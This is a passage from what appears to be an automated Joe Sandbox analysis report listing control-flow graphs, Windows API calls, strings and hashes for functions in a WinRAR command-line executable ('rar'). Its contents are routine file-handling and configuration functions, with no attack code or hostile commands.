                                                        • Instruction Fuzzy Hash: FC11632A61874185EB11AF29A8005A9B760FF85BC8FC45132EA6F07AD5DF3CD106C790

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1715 7ff7f7e87a5b-7ff7f7e87a5e 1716 7ff7f7e87a68 1715->1716 1717 7ff7f7e87a60-7ff7f7e87a66 1715->1717 1718 7ff7f7e87a6b-7ff7f7e87a7c 1716->1718 1717->1716 1717->1718 1719 7ff7f7e87a7e-7ff7f7e87a81 1718->1719 1720 7ff7f7e87aa8 1718->1720 1721 7ff7f7e87a88-7ff7f7e87a8b 1719->1721 1722 7ff7f7e87a83-7ff7f7e87a86 1719->1722 1723 7ff7f7e87aab-7ff7f7e87ab8 1720->1723 1724 7ff7f7e87a8d-7ff7f7e87a90 1721->1724 1725 7ff7f7e87aa4-7ff7f7e87aa6 1721->1725 1722->1720 1722->1721 1726 7ff7f7e87aba-7ff7f7e87abd 1723->1726 1727 7ff7f7e87ac8-7ff7f7e87acb 1723->1727 1724->1720 1728 7ff7f7e87a92-7ff7f7e87a99 1724->1728 1725->1723 1726->1727 1729 7ff7f7e87abf-7ff7f7e87ac6 1726->1729 1730 7ff7f7e87acf-7ff7f7e87ad1 1727->1730 1728->1725 1731 7ff7f7e87a9b-7ff7f7e87aa2 1728->1731 1729->1730 1732 7ff7f7e87b2a-7ff7f7e87bb0 call 7ff7f7ea1d34 call 7ff7f7e83f04 1730->1732 1733 7ff7f7e87ad3-7ff7f7e87ae6 1730->1733 1731->1720 1731->1725 1744 7ff7f7e87bbc 1732->1744 1745 7ff7f7e87bb2-7ff7f7e87bba 1732->1745 1735 7ff7f7e87b0a-7ff7f7e87b27 1733->1735 1736 7ff7f7e87ae8-7ff7f7e87af2 call 7ff7f7e99be0 1733->1736 1735->1732 1739 7ff7f7e87af7-7ff7f7e87b02 1736->1739 1739->1735 1746 7ff7f7e87bbf-7ff7f7e87bc9 1744->1746 1745->1744 1745->1746 1747 7ff7f7e87bcb-7ff7f7e87bd5 call 7ff7f7ea1e1c 1746->1747 1748 7ff7f7e87bda-7ff7f7e87c06 call 7ff7f7e8b540 1746->1748 1747->1748 1752 7ff7f7e87c08-7ff7f7e87c0f 1748->1752 1753 7ff7f7e87c40 1748->1753 1752->1753 1754 7ff7f7e87c11-7ff7f7e87c14 1752->1754 1755 7ff7f7e87c44-7ff7f7e87c5a call 7ff7f7e8aa68 1753->1755 1754->1753 1756 7ff7f7e87c16-7ff7f7e87c2b 1754->1756 1761 7ff7f7e87c5c-7ff7f7e87c6a 1755->1761 1762 7ff7f7e87c85-7ff7f7e87c97 call 7ff7f7e8b540 1755->1762 1756->1755 1758 7ff7f7e87c2d-7ff7f7e87c3e call 7ff7f7ed9b98 1756->1758 1758->1755 1761->1762 1765 7ff7f7e87c6c-7ff7f7e87c7e call 7ff7f7e88d98 1761->1765 1766 7ff7f7e87c9c-7ff7f7e87c9f 1762->1766 1765->1762 1768 7ff7f7e87ca5-7ff7f7e87cfb call 7ff7f7eb9354 call 7ff7f7ea6378 * 2 1766->1768 1769 7ff7f7e87fa4-7ff7f7e87fbe 1766->1769 1777 7ff7f7e87cfd-7ff7f7e87d10 call 7ff7f7e85414 1768->1777 1778 7ff7f7e87d17-7ff7f7e87d1f 1768->1778 1777->1778 1780 7ff7f7e87d25-7ff7f7e87d28 1778->1780 1781 7ff7f7e87de2-7ff7f7e87de6 1778->1781 1780->1781 1785 7ff7f7e87d2e-7ff7f7e87d36 1780->1785 1783 7ff7f7e87e4e-7ff7f7e87e68 call 7ff7f7eb9958 1781->1783 1784 7ff7f7e87de8-7ff7f7e87e49 call 7ff7f7eb98dc 1781->1784 1793 7ff7f7e87e8b-7ff7f7e87e8e 1783->1793 1794 7ff7f7e87e6a-7ff7f7e87e84 1783->1794 1784->1783 1786 7ff7f7e87d59-7ff7f7e87d6a call 7ff7f7eda444 1785->1786 1787 7ff7f7e87d38-7ff7f7e87d49 call 7ff7f7eda444 1785->1787 1801 7ff7f7e87d6c-7ff7f7e87d77 call 7ff7f7eacf8c 1786->1801 1802 7ff7f7e87d78-7ff7f7e87dc6 1786->1802 1799 7ff7f7e87d4b-7ff7f7e87d56 call 7ff7f7ea8ae8 1787->1799 1800 7ff7f7e87d57 1787->1800 1797 7ff7f7e87e90-7ff7f7e87e9a call 7ff7f7eb9990 1793->1797 1798 7ff7f7e87e9f-7ff7f7e87eb8 call 7ff7f7e81204 1793->1798 1794->1793 1797->1798 1813 7ff7f7e87ec8-7ff7f7e87ed9 call 7ff7f7eb941c 1798->1813 1799->1800 1800->1802 1801->1802 1802->1781 1823 7ff7f7e87dc8-7ff7f7e87de1 call 7ff7f7e81314 call 7ff7f7edba34 1802->1823 1817 7ff7f7e87edb-7ff7f7e87f9f call 7ff7f7e81400 call 7ff7f7ea6424 call 7ff7f7e8b540 1813->1817 1818 7ff7f7e87eba-7ff7f7e87ec3 call 7ff7f7eb9680 1813->1818 1817->1769 1818->1813 1823->1781
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H9
                                                        • API String ID: 0-2207570329
                                                        • Opcode ID: 5c5939b4408578c636bb17f45978b84e4d24020e2a7a6674a806dd7389619368
                                                        • Instruction ID: a304fe64145dd9fc4e7a08f73bd6bbb91179a10ca558f13a158837256563e4b0
                                                        • Opcode Fuzzy Hash: 5c5939b4408578c636bb17f45978b84e4d24020e2a7a6674a806dd7389619368
                                                        • Instruction Fuzzy Hash: 77E1D06AA08AD285EB10EB64E044BED67A5FB4974CF854036CE5E077C1DF3CE556C3A0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1858 7ff7f7ea2574-7ff7f7ea259c 1859 7ff7f7ea25a5-7ff7f7ea25a9 1858->1859 1860 7ff7f7ea259e-7ff7f7ea25a0 1858->1860 1862 7ff7f7ea25ba-7ff7f7ea25c6 1859->1862 1863 7ff7f7ea25ab-7ff7f7ea25b6 GetStdHandle 1859->1863 1861 7ff7f7ea273a-7ff7f7ea2756 1860->1861 1864 7ff7f7ea25c8-7ff7f7ea25cd 1862->1864 1865 7ff7f7ea2619-7ff7f7ea2637 WriteFile 1862->1865 1863->1862 1866 7ff7f7ea25cf-7ff7f7ea2609 WriteFile 1864->1866 1867 7ff7f7ea2644-7ff7f7ea2648 1864->1867 1868 7ff7f7ea263b-7ff7f7ea263e 1865->1868 1866->1867 1869 7ff7f7ea260b-7ff7f7ea2615 1866->1869 1870 7ff7f7ea2733-7ff7f7ea2737 1867->1870 1871 7ff7f7ea264e-7ff7f7ea2652 1867->1871 1868->1867 1868->1870 1869->1866 1872 7ff7f7ea2617 1869->1872 1870->1861 1871->1870 1873 7ff7f7ea2658-7ff7f7ea2692 GetLastError call 7ff7f7ea3144 SetLastError 1871->1873 1872->1868 1878 7ff7f7ea2694-7ff7f7ea26a2 1873->1878 1879 7ff7f7ea26bc-7ff7f7ea26d0 call 7ff7f7e9c95c 1873->1879 1878->1879 1880 7ff7f7ea26a4-7ff7f7ea26ab 1878->1880 1885 7ff7f7ea26d2-7ff7f7ea26db 1879->1885 1886 7ff7f7ea2721-7ff7f7ea272e call 7ff7f7e9cf14 1879->1886 1880->1879 1882 7ff7f7ea26ad-7ff7f7ea26b7 call 7ff7f7e9cf34 1880->1882 1882->1879 1885->1862 1888 7ff7f7ea26e1-7ff7f7ea26e3 1885->1888 1886->1870 1888->1862 1889 7ff7f7ea26e9-7ff7f7ea271c 1888->1889 1889->1862
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$Handle
                                                        • String ID:
                                                        • API String ID: 3350704910-0
                                                        • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                        • Instruction ID: 7b8d1d586aed8f7b8d99d8171d2b07c74a49c4299c7540fe5e2c2a69b9ba5526
                                                        • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                        • Instruction Fuzzy Hash: 2A51B72AA0964187FB24EF25E51437AA3A0FB84B50F844136DE6F57AD0DF3CE547C690

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1894 7ff7f7ea1e80-7ff7f7ea1ebb call 7ff7f7eda5a0 1897 7ff7f7ea1ec8 1894->1897 1898 7ff7f7ea1ebd-7ff7f7ea1ec1 1894->1898 1900 7ff7f7ea1ecb-7ff7f7ea1f57 CreateFileW 1897->1900 1898->1897 1899 7ff7f7ea1ec3-7ff7f7ea1ec6 1898->1899 1899->1900 1901 7ff7f7ea1f59-7ff7f7ea1f76 GetLastError call 7ff7f7eb4534 1900->1901 1902 7ff7f7ea1fcd-7ff7f7ea1fd1 1900->1902 1912 7ff7f7ea1f78-7ff7f7ea1fb6 CreateFileW GetLastError 1901->1912 1913 7ff7f7ea1fba 1901->1913 1903 7ff7f7ea1fd3-7ff7f7ea1fd7 1902->1903 1904 7ff7f7ea1ff7-7ff7f7ea200f 1902->1904 1903->1904 1906 7ff7f7ea1fd9-7ff7f7ea1ff1 SetFileTime 1903->1906 1907 7ff7f7ea2011-7ff7f7ea2022 call 7ff7f7eca9e8 1904->1907 1908 7ff7f7ea2027-7ff7f7ea204b call 7ff7f7eda610 1904->1908 1906->1904 1907->1908 1912->1902 1914 7ff7f7ea1fb8 1912->1914 1915 7ff7f7ea1fbf-7ff7f7ea1fc1 1913->1915 1914->1915 1915->1902 1917 7ff7f7ea1fc3 1915->1917 1917->1902
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time
                                                        • String ID:
                                                        • API String ID: 1999340476-0
                                                        • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                        • Instruction ID: d3e6eddf39d9ad70e44beef9f060447bbbec2a35937186a36a5c2a0abd78fbf8
                                                        • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                        • Instruction Fuzzy Hash: 5B415B7AB1818146F7609F24E5047A9ABA0AB457B8F844336DE7E037C4DF7CD4468790

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: swprintf
                                                        • String ID: rar.ini$switches=$switches_%ls=
                                                        • API String ID: 233258989-2235180025
                                                        • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                        • Instruction ID: cd3b922c051911786e0e94f45be678839d5a6be4522ea76c52e4aa5f0a355342
                                                        • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                        • Instruction Fuzzy Hash: 1541802AA1868291EB14FB21E4505F9A3A1FB447A4FC40537EA7F03AD5EF3CD556C3A0

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                        • String ID: rar.lng
                                                        • API String ID: 553376247-2410228151
                                                        • Opcode ID: 6fc4525e2c01ff75cb1dc090003bc499e9c9e61f59ac89338f9cf421c4d87ded
                                                        • Instruction ID: e3a547d9b63ac19b086a6855df19732e34a2ea18ceab3de4a08299c3dd683e1f
                                                        • Opcode Fuzzy Hash: 6fc4525e2c01ff75cb1dc090003bc499e9c9e61f59ac89338f9cf421c4d87ded
                                                        • Instruction Fuzzy Hash: 4E41812EA0828245EB10BB28A4111B9E7A1AF55764FC40137D92F0B6E6CE6DE417C7F0

                                                        Control-flow Graph

                                                        APIs
                                                        • SHGetMalloc.SHELL32(?,00000800,?,00007FF7F7EB4432,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB40C4
                                                        • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EB40DF
                                                        • SHGetPathFromIDListW.SHELL32 ref: 00007FF7F7EB40F1
                                                          • Part of subcall function 00007FF7F7EA3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7F7EB413F,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA34A0
                                                          • Part of subcall function 00007FF7F7EA3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7F7EB413F,?,?,?,?,00000800,00000000,00000000,00007FF7F7EB38CB,?,?,?,00007FF7F7EB41EC), ref: 00007FF7F7EA34D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                        • String ID: WinRAR
                                                        • API String ID: 977838571-3970807970
                                                        • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                        • Instruction ID: 430242d2ecd13933da141b0985e0e94802cf6561e577c70af27e3fe0a076b64b
                                                        • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                        • Instruction Fuzzy Hash: 2021841AA0874240EB50BF1AF8501BA9760AF99BD4F945032DF2F47795DE3CD4468790
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE97A5
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE9807
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE9841
                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F7EE3CEF,?,?,00000000,00007FF7F7EE3CAA,?,?,00000000,00007FF7F7EE3FD9), ref: 00007FF7F7EE986B
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                        • String ID:
                                                        • API String ID: 1557788787-0
                                                        • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                        • Instruction ID: f85b3348bb992e6f4db0a7fc2439cae9ed3a7ebe44c8ebddca8e0fc4439fbd63
                                                        • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                        • Instruction Fuzzy Hash: 1C21A225E08B5181E720AF12A840029E7E4FB54BD0F894536DEAF27BE5DF3CD4538395
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                        • Instruction ID: f9db43767d4175f3b2ac719de960506e03b939263eca97748c4ca593c23d3c63
                                                        • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                        • Instruction Fuzzy Hash: C4218E39E0864682FB64AB21F500379E7B5BF41B95F904133EA7F476C8CE3DD84286A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AFUM$default.sfx
                                                        • API String ID: 0-2491287583
                                                        • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                        • Instruction ID: 4c5a7e4194f59c26fa03fdb02acace18ebe03e0033193ba5be5730c7beb0ddb3
                                                        • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                        • Instruction Fuzzy Hash: EE81A92BA0C64244FB60BB1095402BAA3B0AF52784FC48137DEAF076C5DF6D958BC7B0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
